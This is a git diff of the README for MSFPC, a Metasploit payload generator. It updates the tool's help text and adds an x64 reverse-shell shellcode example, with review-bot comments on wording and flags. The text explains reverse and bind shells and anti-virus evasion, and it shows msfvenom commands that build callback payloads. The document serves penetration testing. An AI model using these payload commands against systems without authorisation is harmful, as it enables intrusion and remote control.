179 changes: 105 additions & 74 deletions README.md
@@ -62,70 +62,84 @@ root@kali:~# apt install -y msfpc

```
$ bash msfpc.sh -h -v
[*] MSFvenom Payload Creator (MSFPC v1.4.4)

msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Example: msfpc.sh windows 192.168.1.10 # Windows & manual IP.
msfpc.sh elf bind eth0 4444 # Linux, eth0's IP & manual port.
msfpc.sh stageless cmd py https # Python, stageless command prompt.
msfpc.sh verbose loop eth1 # A payload for every type, using eth1's IP.
msfpc.sh msf batch wan # All possible Meterpreter payloads, using WAN IP.
msfpc.sh help verbose # Help screen, with even more information.

<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .dll]

Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
<MSF> payloads are generally much larger than <CMD>, as it comes with more features.

<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STAGED> are 'better' in low-bandwidth/high-latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
https://www.offensive-security.com/metasploit-unleashed/payload-types/
https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
[*] MSFvenom Payload Creator (MSFPC v2.1.0)

Usage: msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) [OPTIONS]

<TYPE>:
+ APK
+ ASP
+ ASPX
+ Bash [.sh]
+ Java [.jsp]
+ Linux [.elf]
+ OSX [.macho]
+ Perl [.pl]
+ PHP
+ Powershell [.ps1]
+ Python [.py]
+ Tomcat [.war]
+ Windows [.exe // .dll]

Options (order doesn't matter):
-c, --cmd Generate command shell (instead of meterpreter)
-m, --meterpreter Generate meterpreter shell (default)
-b, --bind Use bind payload (default reverse)
-r, --reverse Use reverse payload
-s, --staged Use staged payload (default for most)
--stageless Use stageless payload
-t, --tcp Use TCP transport (default)
--http Use HTTP transport
--https Use HTTPS transport
-f, --find-port Use find_port transport (allports)
-e, --encoder <enc> Specify encoder (e.g., x86/shikata_ga_nai)
-A, --arch <arch> Specify payload architecture (x86, x64, armle, etc)
-F, --format <format> Override msfvenom output format (c, python, raw, etc)
-o, --output <dir> Output directory (default current)
-a, --batch Generate all possible combinations
-l, --loop Generate one of each TYPE
-v, --verbose Verbose output
-h, --help Show this help

Rather than putting <DOMAIN/IP>, you can use an interface name and MSFPC will detect that IP address.
Missing <DOMAIN/IP> will default to the IP menu.

Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interact with.
<MSF> is a custom cross‑platform shell, gaining the full power of Metasploit.
Missing <CMD/MSF> will default to <MSF> where possible.
Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET; they limit post modules/scripts support.
<MSF> payloads are generally much larger than <CMD>, as they come with more features.

<BIND> opens a port on the target side, and the attacker connects to it; commonly blocked by ingress firewall rules.
<REVERSE> makes the target connect back to the attacker; the attacker must have an open port and outgoing access.
Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows the attacker to connect whenever desired. <REVERSE> needs the target to repeatedly connect back to maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is a complete standalone payload; more 'stable' than <STAGED>.
Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STAGED> are 'better' in low‑bandwidth/high‑latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing anti‑virus protections. <STAGED> may work 'better' with IDS/IPS.
More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
https://www.offensive-security.com/metasploit-unleashed/payload-types/
https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connect back. This is the most compatible with TYPES as it is raw and easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful when packet inspection limits port/protocol use.
<HTTPS> makes the communication appear to be encrypted HTTP traffic (SSL/TLS).
<FIND_PORT> will attempt every port on the target machine to find a way out; switches to 'allports' based on <TYPE>.
Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
Altering the transport (HTTP/HTTPS) slows communication and increases payload size.
More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
$
```
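Review bot: the rewritten <REVERSE> line ("the attacker must have an open port and outgoing access") inverts who needs egress: the old text said the connection is "Blocked with egress firewall rules on the target", and it is the target, not the attacker, that needs outbound access; suggest "The attacker needs an open listening port; the target needs outbound access, which egress firewall rules on the target may block." Three smaller points in the same hunk: the old "Example:" lines and the positional keywords (bind, reverse, stageless, cmd, msf, batch, loop, wan, verbose) are dropped from the usage line, yet the explanatory paragraphs still refer to <CMD/MSF>, <BIND/REVERSE> and <BATCH/LOOP> as tokens and the README's later examples still invoke them as keywords, so the help should state whether keywords are still accepted alongside the new flags; "STAGLESS" in the <BATCH> line is a typo carried over from the old text (should be "STAGELESS"); and the merged <TCP> sentence now reads as if being raw is what makes it "easily detected on IDSs", so keep "most compatible ... as it is raw" and "Can be easily detected on IDSs" as two statements as before. Finally, -a (batch) and -A (arch) differ only in case, which is an easy mistype for a flag that generates every combination; consider a different short letter for one of them.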

@@ -134,7 +148,7 @@ $

```bash
$ bash msfpc.sh windows 192.168.1.10
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] IP: 192.168.1.10
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
Expand All @@ -156,7 +170,7 @@ $

```bash
$ ./msfpc.sh elf bind eth0 4444 verbose
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] IP: 192.168.103.142
[i] PORT: 4444
[i] TYPE: linux (linux/x86/shell/bind_tcp)
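Review bot: only the version string changed here, but the command on the first line, `./msfpc.sh elf bind eth0 4444 verbose`, still uses the positional keywords `bind` and `verbose` that the updated help documents only as `-b, --bind` and `-v, --verbose`; either rewrite the example in the flag form or keep the keyword syntax documented in the help so the examples and the help agree.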
@@ -187,7 +201,7 @@ $

```bash
$ msfpc stageless cmd py tcp
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)

[i] Use which interface - IP address?:
[i] 1.) eth0 - 192.168.103.142
@@ -218,10 +232,10 @@ _Note: Removed WAN IP._

```bash
$ ./msfpc.sh loop wan
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] Loop Mode. Creating one of each TYPE, with default values

[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] IP: xxx.xxx.xxx.xxx
[i] PORT: 443
[i] TYPE: android (android/meterpreter/reverse_tcp)
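Review bot: `./msfpc.sh loop wan` on the first line uses `loop`, which the new help lists only as `-l, --loop`, and `wan`, which no longer appears anywhere in the help text; if `wan` is still a valid IP selector it needs a line next to "Rather than putting <DOMAIN/IP>, you can use an interface name", otherwise this example should be updated.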
@@ -237,7 +251,7 @@ $ ./msfpc.sh loop wan
[*] Done!


[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[*] MSFvenom Payload Creator (MSFPC v2.1.0)

...SNIP...

@@ -251,13 +265,30 @@ _Note: Removed WAN IP._

![Examples](https://i.imgur.com/8zPx6p3.png)

## Example \#5 (x64 shellcode)

```bash
$ msfpc windows 10.0.0.1 -A x64 -F c
[*] MSFvenom Payload Creator (MSFPC v2.1.0)
[i] IP: 10.0.0.1
[i] PORT: 443
[i] TYPE: windows/x64/meterpreter/reverse_tcp
[i] CMD: msfvenom -p windows/x64/meterpreter/reverse_tcp -f c \
--platform windows -a x64 LHOST=10.0.0.1 LPORT=443 \
> '/root/windows-x64-meterpreter-reverse-tcp-443.c'

[i] shellcode saved: '/root/windows-x64-meterpreter-reverse-tcp-443.c'

[*] Done!
```

- - -

## New features

## To-Do List
MSFPC now supports:

* Shellcode generation
* x64 payloads
* IPv6 support
* **Shellcode generation** – override the output format with `-F`/`--format` (e.g. `c`, `python`, `raw`, etc.) to receive raw shellcode or language‑specific wrappers.
* **x64 (and other) architectures** – specify `-A`/`--arch` to select payload architecture (e.g. `x64`, `x86`, `armle`, etc.). The payload name will be adjusted accordingly (e.g. `windows/x64/meterpreter/reverse_tcp`).
* IPv6 support (work in progress)
* Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_
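Review bot: the unchanged to-do item "Look into using OS scripting more ..." at the end of the hunk now sits directly under the "MSFPC now supports:" list, and "IPv6 support (work in progress)" is listed as a supported feature; keep a "## To-Do List" heading below the new "## New features" list and move those two items under it so finished and pending work are not mixed. In Example #5 the "[i] TYPE:" line prints the bare payload path (`windows/x64/meterpreter/reverse_tcp`) whereas every other example prints "TYPE: windows (windows/meterpreter/reverse_tcp)"; the `-A` change should keep the same output format, e.g. "TYPE: windows (windows/x64/meterpreter/reverse_tcp)".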